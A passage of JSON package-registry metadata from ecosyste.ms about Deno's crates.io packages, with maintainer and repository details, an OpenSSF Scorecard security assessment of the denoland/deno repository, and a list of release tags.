authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cache_dir/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cache_dir/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cache_dir/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cache_dir/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cache_dir/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cache_dir/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2025-09-17T10:26:40.407Z","updated_at":"2025-09-17T10:26:40.407Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-08-31T14:35:57.854Z","updated_at":"2023-08-31T14:35:57.854Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":11082685,"name":"deno_telemetry","ecosystem":"cargo","description":"Telemetry for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":80,"first_release_published_at":"2024-11-25T16:56:15.862Z","latest_release_published_at":"2026-08-27T15:20:39.654Z","latest_release_number":"0.80.0","last_synced_at":"2026-09-07T22:53:50.847Z","created_at":"2024-11-25T17:03:29.803Z","updated_at":"2026-09-07T22:53:50.847Z","registry_url":"https://crates.io/crates/deno_telemetry/","install_command":"cargo install deno_telemetry","documentation_url":"https://docs.rs/deno_telemetry/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z"